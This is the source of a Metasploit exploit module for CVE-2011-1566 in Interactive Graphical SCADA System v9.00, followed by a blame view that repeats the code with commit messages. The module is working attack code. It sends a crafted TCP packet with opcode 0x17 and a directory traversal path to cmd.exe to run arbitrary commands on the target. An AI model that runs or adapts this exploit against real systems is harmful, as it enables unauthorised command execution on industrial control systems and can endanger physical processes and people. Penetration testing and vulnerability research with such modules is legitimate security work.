metasploit-framework/modules/exploits/windows/scada/igss_exec_17.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Interactive Graphical SCADA System Remote Command Injection',
      'Description'    => %q{
          This module abuses a directory traversal flaw in Interactive
        Graphical SCADA System v9.00. In conjunction with the traversal
        flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
        may be able to execute arbitrary system commands.
      },
      'Author'         =>
        [
          'Luigi Auriemma',
          'MC'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2011-1566'],
          [ 'OSVDB', '72349'],
          [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 153,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows', {} ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 21 2011'))

    register_options(
      [
        Opt::RPORT(12397)
      ])
  end

  def exploit

    print_status("Sending exploit packet...")

    connect

    packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
    packet << [0x00000100].pack('V') + [0x00000017].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V') + [0x00000000].pack('V')
    packet << [0x00000000].pack('V')
    packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
    packet << "\x00" * (143) #

    sock.put(packet)
    sock.get_once(-1,0.5)
    disconnect

  end
end
Support Windows CMD generic payload 2013-10-17 19:07:27 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Change plate 2013-10-21 16:24:30 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Support Windows CMD generic payload 2013-10-17 19:07:27 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Support Windows CMD generic payload 2013-10-17 19:07:27 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::Tcp`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Interactive Graphical SCADA System Remote Command Injection',`
			`'Description' => %q{`
			`This module abuses a directory traversal flaw in Interactive`
			`Graphical SCADA System v9.00. In conjunction with the traversal`
			`flaw, if opcode 0x17 is sent to the dc.exe process, an attacker`
			`may be able to execute arbitrary system commands.`
			`},`
			`'Author' =>`
			`[`
			`'Luigi Auriemma',`
			`'MC'`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2011-1566'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '72349'],`
Support Windows CMD generic payload 2013-10-17 19:07:27 +00:00			`[ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],`
			`],`
			`'Platform' => 'win',`
			`'Arch' => ARCH_CMD,`
			`'Payload' =>`
			`{`
			`'Space' => 153,`
			`'DisableNops' => true`
			`},`
			`'Targets' =>`
			`[`
			`[ 'Windows', {} ]`
			`],`
			`'DefaultTarget' => 0,`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Mar 21 2011'))`

			`register_options(`
			`[`
			`Opt::RPORT(12397)`
Fix msf/core and self.class msftidy warnings Also fixed rex requires. 2017-05-03 20:42:21 +00:00			`])`
Support Windows CMD generic payload 2013-10-17 19:07:27 +00:00			`end`

			`def exploit`

			`print_status("Sending exploit packet...")`

			`connect`

			`packet = [0x00000100].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000100].pack('V') + [0x00000017].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V') + [0x00000000].pack('V')`
			`packet << [0x00000000].pack('V')`
			`packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"`
			`packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"`
			`packet << "\x00" * (143) #`

			`sock.put(packet)`
			`sock.get_once(-1,0.5)`
			`disconnect`

			`end`
			`end`